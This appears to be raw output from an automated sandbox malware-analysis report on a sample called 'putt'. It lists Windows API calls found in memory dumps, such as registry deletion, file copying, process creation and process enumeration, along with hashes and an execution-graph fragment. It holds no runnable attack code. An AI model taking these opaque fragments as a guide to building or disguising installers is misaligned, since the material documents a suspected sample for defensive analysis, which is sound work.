                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                              • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                              • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                              • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                              • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                              • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                              • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                              • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                              • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                              • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                              • Opcode ID: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                              • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b15896a84fc5e7a6d3d9a22e8d585b885ca92bf9a6589a07360a0de3a23a39
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                              • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                              • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                              • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                              • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                              • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                              • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                              • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                              • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                              • String ID: %02x%c$...
                                                                                                                                                                                                                                                                              • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                              • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                              • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                              • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                              • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                              • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                              • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ae45dc5b744dabfc446a34129bb4571dfe0fe142ad68b921cc5a8ab1e19b1d4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                              • String ID: Version
                                                                                                                                                                                                                                                                              • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                              • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                              • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                              • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                              • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                              • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                              • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                              • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                              • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                              • String ID: !N~
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                              • String ID: Error launching installer
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                              • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                                                                                                                                                              • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                              • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                              Execution Coverage:3.3%
                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                              Signature Coverage:3.6%
                                                                                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                                                                                              Total number of Limit Nodes:49
96909 70e36b 41 API calls 96885->96909 96886->96882 96910 70e36b 41 API calls 96886->96910 96888 71017b 8 API calls 96887->96888 96889 6fbf88 96888->96889 96890 71014b 8 API calls 96889->96890 96891 6fbf96 96890->96891 96892 6facc0 96891->96892 96893 6faccf 96892->96893 96895 6face1 96892->96895 96894 6fc2c9 8 API calls 96893->96894 96901 6facda __fread_nolock 96893->96901 96896 7405a3 __fread_nolock 96894->96896 96895->96893 96897 740557 96895->96897 96898 6fad07 96895->96898 96900 71014b 8 API calls 96897->96900 96911 6f88e8 8 API calls 96898->96911 96902 740561 96900->96902 96901->96831 96903 71017b 8 API calls 96902->96903 96903->96893 96905 6fae02 96904->96905 96906 6fae0b __fread_nolock 96904->96906 96905->96906 96907 6fc2c9 8 API calls 96905->96907 96906->96833 96906->96906 96907->96906 96908->96834 96909->96885 96910->96886 96911->96901 96912->96848 96914 71014b 8 API calls 96913->96914 96915 6f7e30 96914->96915 96915->96863 96917 6fc76b 96916->96917 96918 741285 96917->96918 96923 6fc773 ISource 96917->96923 96919 71014b 8 API calls 96918->96919 96920 741291 96919->96920 96921 6fc77a 96921->96865 96923->96921 96924 6fc7e0 8 API calls ISource 96923->96924 96924->96923 96935 75e80e 96925->96935 96927 75ddd4 Process32NextW 96928 75de86 CloseHandle 96927->96928 96934 75ddcd 96927->96934 96928->96641 96929 6fbf73 8 API calls 96929->96934 96930 6fb329 8 API calls 96930->96934 96934->96927 96934->96928 96934->96929 96934->96930 96941 6f568e 96934->96941 96983 6f7bb5 96934->96983 96992 70e36b 41 API calls 96934->96992 96936 75e819 96935->96936 96937 75e830 96936->96937 96940 75e836 96936->96940 96993 716722 GetStringTypeW 96936->96993 96994 71666b 39 API calls 96937->96994 96940->96934 96942 6fbf73 8 API calls 96941->96942 96943 6f56a4 96942->96943 96944 6fbf73 8 API calls 96943->96944 96945 6f56ac 96944->96945 96946 6fbf73 8 API calls 96945->96946 96947 6f56b4 96946->96947 96948 6fbf73 8 API calls 96947->96948 96949 6f56bc 96948->96949 96950 734da1 96949->96950 
